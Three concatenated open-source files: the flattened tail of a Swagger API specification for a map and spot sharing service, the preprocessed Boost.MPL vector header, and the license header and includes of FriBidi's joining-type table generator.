- description: collaborator attributes
in: body
name: collaborator
required: false
schema:
$ref: "#/definitions/CollaboratorEditable"
responses:
"200":
description: Contains collaborator data
schema:
$ref: "#/definitions/Collaborator"
summary: Update collaborator
tags:
- Collaborators
"/maps/{id}/comments":
get:
description: List comments for a given map.
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of comments.
schema:
items:
$ref: "#/definitions/Comment"
type: array
summary: List comments for a given map
tags:
- Comments
post:
description: Create map comment. Wrap comment parameters in [comment].
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: comment attributes
in: body
name: comment
required: false
schema:
$ref: "#/definitions/CommentEditable"
responses:
"200":
description: Contains comment data
schema:
$ref: "#/definitions/Comment"
summary: Create map comment
tags:
- Comments
"/maps/{id}/respots":
get:
description: List respots of a map.
parameters:
- description: Map Id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of respots.
schema:
items:
$ref: "#/definitions/Respot"
type: array
summary: List respots of a map
tags:
- Respots
"/maps/{id}/spots":
get:
description: List spots for a given map.
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
- description: Order of spots
enum:
- created_at_asc
- created_at_desc
- updated_at_asc
- updated_at_desc
- title_asc
- title_desc
in: query
name: order
type: string
responses:
"200":
description: Contains list of spots.
schema:
items:
$ref: "#/definitions/Spot"
type: array
summary: List spots for a given map
tags:
- Spots
post:
description: Create spot. Wrap parameters in [spot]. To add a spot picture pass a base64 encoded string to [spot][picture].
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
- description: spot attributes
in: body
name: spot
required: true
schema:
$ref: "#/definitions/SpotEditable"
responses:
"200":
description: Contains spot data
schema:
$ref: "#/definitions/Spot"
summary: Create spot
tags:
- Spots
"/maps/{id}/subscriptions":
delete:
description: Unsubscribe from map.
parameters:
- description: map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted subscription.
schema:
$ref: "#/definitions/Subscription"
summary: Unsubscribe from map
tags:
- Subscriptions
get:
description: List subscriptions for a given map.
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of subscriptions.
schema:
items:
$ref: "#/definitions/Subscription"
type: array
summary: List subscriptions for a given map
tags:
- Subscriptions
"/maps/{map_id}/spots/{id}":
get:
description: Get basic information about a spot
parameters:
- description: Id of spot
in: path
name: id
required: true
type: integer
- description: Id of map
in: path
name: map_id
required: true
type: integer
responses:
"200":
description: Contains spot data
schema:
$ref: "#/definitions/Spot"
summary: Get spot
tags:
- Spots
"/maps/{map_id}/spots/{spot_id}/respot":
delete:
description: Delete respot from map by spot id.
parameters:
- description: Map Id
in: path
name: map_id
required: true
type: integer
- description: Spot Id
in: path
name: spot_id
required: true
type: integer
responses:
"200":
description: Contains deleted respot.
schema:
$ref: "#/definitions/Respot"
summary: Delete respot from map by spot id
tags:
- Respots
/respot_maps:
get:
description: List maps that user can respot to.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List maps that user can respot to
tags:
- Respots
"/respots/{id}":
delete:
description: Delete respot.
parameters:
- description: Respot Id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted respot.
schema:
$ref: "#/definitions/Respot"
summary: Delete respot
tags:
- Respots
get:
description: Get basic information about a respot
parameters:
- description: Id of respot
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains respot data.
schema:
$ref: "#/definitions/Respot"
summary: Get respot
tags:
- Respots
"/share/map/{id}":
get:
description: Get secret access token of an uebermap with access set to 'Secret link'. Pass the 'token' on every request you make to access this uebermap and its resources. F.e. token=1-x_gqu7eLBe3uKoAGAGXy
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains map data and a secret token to access this map.
schema:
$ref: "#/definitions/MapWithAuthToken"
summary: Get secret access token to share map
tags:
- Share
/spots:
get:
description: List your own spots.
parameters:
- description: Order of spots
enum:
- created_at_asc
- created_at_desc
- updated_at_asc
- updated_at_desc
- title_asc
- title_desc
in: query
name: order
type: string
responses:
"200":
description: Contains list of spots.
schema:
items:
$ref: "#/definitions/Spot"
type: array
summary: List your own spots
tags:
- Spots
/spots/search:
get:
description: Search spots
parameters:
- description: Query
in: query
name: q
type: string
- description: "Distance. Diameter of search radius in meter (default: 2000 meter)"
in: query
name: d
type: integer
- description: Latitude for search radius (2 km)
in: query
name: lat
type: number
- description: Longitude for search radius (2 km)
in: query
name: lon
type: number
responses:
"200":
description: Contains spot data.
schema:
$ref: "#/definitions/Spot"
summary: Search spots
tags:
- Search
"/spots/{id}":
delete:
description: Delete spot.
parameters:
- description: spot id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted spot.
schema:
$ref: "#/definitions/Spot"
summary: Delete spot
tags:
- Spots
patch:
description: Update spot. Wrap parameters in [spot]. To update the spot picture pass a base64 encoded string to [spot][picture].
parameters:
- description: spot id
in: path
name: id
required: true
type: integer
- description: spot attributes
in: body
name: spot
required: false
schema:
$ref: "#/definitions/SpotEditable"
responses:
"200":
description: Contains spot data
schema:
$ref: "#/definitions/Spot"
summary: Update spot
tags:
- Spots
"/spots/{id}/attachments":
get:
description: List attachments for a given spot.
parameters:
- description: Spot id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of attachments.
schema:
items:
$ref: "#/definitions/Attachment"
type: array
summary: List attachments for a given spot
tags:
- Attachments
post:
description: Upload spot attachment. Wrap attachment parameters in [attachment]
parameters:
- description: Spot id
in: path
name: id
required: true
type: integer
- description: Base64 encoded image
in: body
name: image
required: true
schema:
type: string
responses:
"200":
description: Contains attachment data
schema:
$ref: "#/definitions/Attachment"
summary: Upload spot attachment
tags:
- Attachments
"/spots/{id}/comments":
get:
description: List comments for a given spot.
parameters:
- description: Id of spot
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of comments.
schema:
items:
$ref: "#/definitions/Comment"
type: array
summary: List comments for a given spot
tags:
- Comments
post:
description: Create spot comment. Wrap comment parameters in [comment].
parameters:
- description: spot id
in: path
name: id
required: true
type: integer
- description: comment attributes
in: body
name: comment
required: false
schema:
$ref: "#/definitions/CommentEditable"
responses:
"200":
description: Contains comment data
schema:
$ref: "#/definitions/Comment"
summary: Create spot comment
tags:
- Comments
"/spots/{id}/events":
get:
      description: List events for a given spot.
parameters:
- description: Id of spot
in: path
name: id
required: true
type: integer
- description: Begin of time range of event (ISO 8601 date format).
in: query
name: timeframe_start
required: false
type: string
- description: End of time range of event (ISO 8601 date format).
in: query
name: timeframe_end
required: false
type: string
        - description: "To refine your event index request to contain only events within a geographical box pass the following bounds parameters. E.g. to get events within 'Hamburg, St. Pauli': bounds[sw_lat]=53.54831449741324 bounds[sw_lon]=9.943227767944336 bounds[ne_lat]=53.5571103674878 bounds[ne_lon]=9.9776029586792"
in: query
name: bounds
required: false
type: string
responses:
"200":
description: Contains list of events.
schema:
items:
$ref: "#/definitions/Event"
type: array
summary: List events for a given spot
tags:
- Events
post:
description: Create event. Wrap map parameters in [event].
parameters:
- description: Spot id
in: path
name: id
required: true
type: integer
- description: Event attributes
in: body
name: event
required: false
schema:
$ref: "#/definitions/EventEditable"
responses:
"200":
description: Contains event data
schema:
$ref: "#/definitions/Event"
summary: Create event
tags:
- Events
"/spots/{id}/respots":
post:
description: Respot a spot onto a map.
parameters:
- description: Spot Id
in: path
name: id
required: true
type: integer
- description: Map Id
in: body
name: map_id
required: true
schema:
format: integer
type: number
responses:
"200":
description: Contains respot data.
schema:
$ref: "#/definitions/Respot"
summary: Respot a spot onto a map
tags:
- Respots
/subscriptions:
get:
description: List subscriptions.
parameters:
- description: Id of user
in: query
name: user_id
type: integer
- description: Id of map
in: query
name: map_id
type: integer
responses:
"200":
description: Contains list of subscriptions.
schema:
items:
$ref: "#/definitions/Subscription"
type: array
summary: List subscriptions. Pass no parameters to get own subscriptions
tags:
- Subscriptions
post:
description: Create map subscription.
parameters:
- description: map id
in: body
name: map_id
required: true
schema:
format: integer
type: number
responses:
"200":
description: Contains subscription data.
schema:
$ref: "#/definitions/Subscription"
summary: Create map subscription
tags:
- Subscriptions
/trends/latest:
get:
description: List latest maps.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List latest maps
tags:
- Trends
/trends/recommended:
get:
description: List recommended maps.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List recommended maps
tags:
- Trends
/users/search:
get:
description: Search users
parameters:
- description: Query
in: query
name: q
type: string
responses:
"200":
description: Contains users data.
schema:
$ref: "#/definitions/User"
summary: Search users
tags:
- Search
"/users/{id}":
get:
      description: Get the profile of a user
parameters:
- description: Id of user
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains user data
schema:
$ref: "#/definitions/User"
summary: Get user profile
tags:
- Users
"/users/{user_id}/maps":
get:
description: List maps for a given user.
parameters:
- description: Id of user
in: path
name: user_id
required: true
type: integer
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List maps for a given user
tags:
- Maps
definitions:
Attachment:
properties:
attachable_id:
example: 7543829
type: integer
attachable_type:
example: Spot
type: string
created_at:
format: date-time
type: string
description:
example: This photo was taken in front of the restaurant
type: string
file_url:
example: https://...
type: string
id:
example: 34939432
type: integer
map_id:
example: 985732
type: integer
sizes:
example:
large:
h: 860
w: 1024
type: object
spot:
$ref: "#/definitions/Spot"
status:
enum:
- approved
- unapproved
example: approved
type: string
user:
$ref: "#/definitions/User"
Collaborator:
properties:
created_at:
format: date-time
type: string
group:
enum:
- admin
- editor
example: editor
type: string
id:
example: 4829504
type: integer
is_admin:
example: false
type: boolean
map:
$ref: "#/definitions/Map"
map_id:
example: 324894
type: integer
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
user_id:
example: 649302
type: integer
CollaboratorEditable:
properties:
group:
enum:
- admin
- editor
example: editor
type: string
CollaboratorInvitation:
properties:
accepted:
example: true
type: boolean
created_at:
format: date-time
type: string
email:
example: [email protected]
type: string
group:
enum:
- admin
- editor
example: editor
type: string
id:
example: 8696493
type: integer
invited_by_user:
$ref: "#/definitions/User"
map:
$ref: "#/definitions/Map"
sent:
example: true
type: boolean
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
CollaboratorInvitationCreate:
properties:
emails:
example: [email protected], [email protected], [email protected]
type: string
is_admin:
example: true
type: boolean
map_id:
example: 34925783
type: integer
user_ids:
example: 5839459, 389423, 89494, 686950
type: string
Comment:
properties:
body:
example: Nice photo
type: string
created_at:
format: date-time
type: string
id:
example: 29628358
type: integer
status:
enum:
- approved
- unapproved
example: approved
type: string
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
CommentEditable:
properties:
body:
example: Nice photo
type: string
Event:
properties:
counts:
$ref: "#/definitions/EventCounts"
created_at:
format: date-time
type: string
description:
example: Very special event
type: string
ends_at:
format: date-time
type: string
id:
example: 482959
type: integer
lat:
example: 53.293493
type: number
lon:
example: 12.394328
type: number
owner_id:
example: 82389429
type: integer
picture_url:
example: https://...
type: string
spot:
$ref: "#/definitions/Spot"
starts_at:
format: date-time
type: string
time_zone:
example: Berlin
type: string
title:
example: 20th anniversary event
type: string
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
EventCounts:
properties:
attachments:
example: 27
type: integer
comments:
example: 284
type: integer
EventEditable:
properties:
description:
example: Very special event
type: string
ends_at:
format: date-time
type: string
lat:
example: 53.293493
type: number
lon:
example: 12.394328
type: number
picture:
example: <BASE_64_ENCODED_STRING>
type: string
starts_at:
format: date-time
type: string
time_zone:
example: Berlin
type: string
title:
example: 20th anniversary event
type: string
user_id:
example: 703943
type: integer
Map:
properties:
counts:
$ref: "#/definitions/MapCounts"
created_at:
format: date-time
type: string
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
id:
example: 18234843
type: integer
map_settings:
$ref: "#/definitions/MapSettings"
owner_id:
example: 9829358
type: integer
picture_url:
example: https://...
type: string
title:
example: My favourite places in Berlin
type: string
updated_at:
format: date-time
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
MapCounts:
properties:
attachments:
example: 31
type: integer
comments:
example: 234
type: integer
impressions:
example: 234332
type: integer
respots:
example: 24
type: integer
spots:
example: 67
type: integer
subscriptions:
example: 3892
type: integer
MapEditable:
properties:
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
map_settings:
$ref: "#/definitions/MapSettings"
picture:
example: <BASE_64_ENCODED_STRING>
type: string
title:
example: My favourite places in Berlin
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
MapRelation:
properties:
access:
example:
- can_administer.map
- can_administer.spots
- can_administer.events
- can_administer.comments
- can_administer.attachments
- can_administer.collaborators
type: string
access_group:
enum:
- visitor
- editor
- admin
example: owner
type: string
subscribed:
example: true
type: boolean
MapSettings:
properties:
editor_access:
example:
- can_administer.map
- can_administer.spots
- can_administer.events
- can_administer.comments
- can_administer.attachments
- can_administer.collaborators
type: string
respotting_to_this_map:
example: true
type: boolean
visitor_access:
example:
- can_administer.map
- can_administer.spots
- can_administer.events
- can_administer.comments
- can_administer.attachments
- can_administer.collaborators
type: string
MapWithAuthToken:
properties:
counts:
$ref: "#/definitions/MapCounts"
created_at:
format: date-time
type: string
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
id:
example: 18234843
type: integer
owner_id:
example: 9829358
type: integer
picture_url:
example: https://...
type: string
title:
example: My favourite places in Berlin
type: string
token:
example: 1-x_gqu7eLBe3uKoAGAGXy
type: string
updated_at:
format: date-time
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
MapWithRelation:
properties:
counts:
$ref: "#/definitions/MapCounts"
created_at:
format: date-time
type: string
description:
example: A collection of restaurants, cafes, clubs and random spots that I recommend in Berlin
type: string
id:
example: 18234843
type: integer
map_settings:
$ref: "#/definitions/MapSettings"
owner_id:
example: 9829358
type: integer
picture_url:
example: https://...
type: string
relation:
$ref: "#/definitions/MapRelation"
title:
example: My favourite places in Berlin
type: string
updated_at:
format: date-time
type: string
visibility:
enum:
- public
- link
- private
example: public
type: string
Respot:
properties:
created_at:
format: date-time
type: string
id:
example: 589032
type: integer
map:
$ref: "#/definitions/Map"
map_id:
example: 8393450
type: integer
spot:
$ref: "#/definitions/Spot"
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
Spot:
properties:
counts:
$ref: "#/definitions/SpotCounts"
created_at:
format: date-time
type: string
description:
example: Landed here by accident but look how wonderful this place is in the photos attached
type: string
id:
example: 5932234
type: integer
lat:
example: 53.112385
type: number
lon:
example: 10.58349
type: number
map_id:
example: 394805
type: integer
picture_url:
example: https://...
type: string
status:
enum:
- approved
- unapproved
example: approved
type: string
time_zone:
example: Berlin
type: string
title:
example: Beautiful place out in the country
type: string
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
SpotCounts:
properties:
attachments:
example: 4
type: integer
comments:
example: 24
type: integer
respot:
example: 34
type: integer
SpotEditable:
properties:
description:
example: Landed here by accident but look how wonderful this place is in the photos attached
type: string
lat:
example: 53.112385
type: number
lon:
example: 10.58349
type: number
picture:
example: <BASE_64_ENCODED_STRING>
type: string
time_zone:
example: Berlin
type: string
title:
example: Beautiful place out in the country
type: string
Subscription:
properties:
created_at:
format: date-time
type: string
id:
example: 23950552
type: integer
map:
$ref: "#/definitions/Map"
updated_at:
format: date-time
type: string
user:
$ref: "#/definitions/User"
user_id:
example: 852002
type: integer
User:
properties:
about:
example: The comedian
type: string
counts:
properties:
maps:
example: 24
type: integer
header_picture:
example: https://...
type: string
id:
example: 5829035
type: integer
location:
example: Little Rock, Arkansas
type: string
name:
example: Bill Hicks
type: string
picture_url:
example: https://...
type: string
screen_name:
example: billhicks
type: string
url:
example: http://www.billhicks.com
type: string
UserAuthentication:
properties:
email:
example: [email protected]
type: string
password:
example: ••••••••
type: string
UserEditable:
properties:
about:
example: The comedian
type: string
header:
example: <BASE_64_ENCODED_STRING>
type: string
language:
example: en
type: string
location:
example: Little Rock, Arkansas
type: string
name:
example: Bill Hicks
type: string
picture:
example: <BASE_64_ENCODED_STRING>
type: string
screen_name:
example: billhicks
type: string
time_zone:
example: Pacific Time (US & Canada)
type: string
url:
example: http://www.billhicks.com
type: string
UserFullProfile:
allOf:
- $ref: "#/definitions/User"
properties:
auth_token:
example: 6g8as82h3kj23h2
type: string
language:
example: en
type: string
time_zone:
example: Pacific Time (US & Canada)
type: string
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/vector.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl {
namespace aux {
template< int N >
struct vector_chooser;
}
namespace aux {
template<>
struct vector_chooser<0>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef vector0<
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<1>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector1<
T0
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<2>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector2<
T0, T1
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<3>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector3<
T0, T1, T2
>::type type;
};
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<4>
{
template<
typename T0, typename T1, typename T2, typename T3, typename T4
, typename T5, typename T6, typename T7, typename T8, typename T9
, typename T10, typename T11, typename T12, typename T13, typename T14
, typename T15, typename T16, typename T17, typename T18, typename T19
>
struct result_
{
typedef typename vector4<
T0, T1, T2, T3
>::type type;
};
};
} // namespace aux
// Preprocessed Boost.MPL boilerplate (machine-generated; normally produced by
// the MPL preprocessing scripts — edit the source templates, not this output).
// Each vector_chooser<N> specialization maps "N supplied arguments" to the
// concrete fixed-size vectorN<> implementation, ignoring the trailing unused
// type parameters.
namespace aux {
template<>
struct vector_chooser<5>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector5<
              T0, T1, T2, T3, T4
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<6>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector6<
              T0, T1, T2, T3, T4, T5
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<7>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector7<
              T0, T1, T2, T3, T4, T5, T6
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<8>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector8<
              T0, T1, T2, T3, T4, T5, T6, T7
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<9>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector9<
              T0, T1, T2, T3, T4, T5, T6, T7, T8
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<10>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector10<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<11>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector11<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<12>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector12<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<13>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector13<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<14>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector14<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<15>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector15<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<16>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector16<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<17>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector17<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<18>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector18<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<19>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector19<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18
            >::type type;
    };
};
} // namespace aux
namespace aux {
template<>
struct vector_chooser<20>
{
    template<
          typename T0, typename T1, typename T2, typename T3, typename T4
        , typename T5, typename T6, typename T7, typename T8, typename T9
        , typename T10, typename T11, typename T12, typename T13, typename T14
        , typename T15, typename T16, typename T17, typename T18, typename T19
        >
    struct result_
    {
        typedef typename vector20<
              T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
            >::type type;
    };
};
} // namespace aux
namespace aux {
// is_vector_arg<T>: compile-time flag — true for any real type argument,
// false for the 'na' placeholder that marks an unsupplied slot.
template< typename T >
struct is_vector_arg
{
    BOOST_STATIC_CONSTANT(bool, value = true);
};
template<>
struct is_vector_arg<na>
{
    BOOST_STATIC_CONSTANT(bool, value = false);
};
// vector_count_args: counts how many of the 20 argument slots were actually
// supplied (i.e. are not 'na'), by summing the 0/1 flags above.
template<
      typename T1, typename T2, typename T3, typename T4, typename T5
    , typename T6, typename T7, typename T8, typename T9, typename T10
    , typename T11, typename T12, typename T13, typename T14, typename T15
    , typename T16, typename T17, typename T18, typename T19, typename T20
    >
struct vector_count_args
{
    BOOST_STATIC_CONSTANT(int, value =
          is_vector_arg<T1>::value + is_vector_arg<T2>::value
        + is_vector_arg<T3>::value + is_vector_arg<T4>::value
        + is_vector_arg<T5>::value + is_vector_arg<T6>::value
        + is_vector_arg<T7>::value + is_vector_arg<T8>::value
        + is_vector_arg<T9>::value + is_vector_arg<T10>::value
        + is_vector_arg<T11>::value + is_vector_arg<T12>::value
        + is_vector_arg<T13>::value + is_vector_arg<T14>::value
        + is_vector_arg<T15>::value + is_vector_arg<T16>::value
        + is_vector_arg<T17>::value + is_vector_arg<T18>::value
        + is_vector_arg<T19>::value + is_vector_arg<T20>::value
        );
};
// vector_impl: counts the supplied arguments, then dispatches through
// vector_chooser<N>::result_ to select the matching fixed-size vectorN<>.
template<
      typename T0, typename T1, typename T2, typename T3, typename T4
    , typename T5, typename T6, typename T7, typename T8, typename T9
    , typename T10, typename T11, typename T12, typename T13, typename T14
    , typename T15, typename T16, typename T17, typename T18, typename T19
    >
struct vector_impl
{
    typedef aux::vector_count_args<
          T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
        > arg_num_;
    typedef typename aux::vector_chooser< arg_num_::value >
        ::template result_< T0,T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19 >::type type;
};
} // namespace aux
// mpl::vector — the user-facing sequence front end.  All 20 slots default to
// the 'na' placeholder; the aux machinery above counts the arguments the user
// actually supplied and inherits from the correspondingly-sized vectorN<>.
template<
      typename T0 = na, typename T1 = na, typename T2 = na, typename T3 = na
    , typename T4 = na, typename T5 = na, typename T6 = na, typename T7 = na
    , typename T8 = na, typename T9 = na, typename T10 = na, typename T11 = na
    , typename T12 = na, typename T13 = na, typename T14 = na
    , typename T15 = na, typename T16 = na, typename T17 = na
    , typename T18 = na, typename T19 = na
    >
struct vector
    : aux::vector_impl<
          T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
        >::type
{
    typedef typename aux::vector_impl<
          T0, T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19
        >::type type;
};
}}
| {
"pile_set_name": "Github"
} |
/* FriBidi
* gen-joining-type-tab.c - generate joining-type.tab.i
*
* Author:
* Behdad Esfahbod, 2004
*
* Copyright (C) 2004 Sharif FarsiWeb, Inc
* Copyright (C) 2004 Behdad Esfahbod
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this library, in a file named COPYING; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA
*
* For licensing issues, contact <[email protected]>.
*/
#include <common.h>
#include <fribidi-unicode.h>
#include <stdio.h>
#ifdef HAVE_CONFIG_H
# include <config.h>
#endif
#ifdef STDC_HEADERS
# include <stdlib.h>
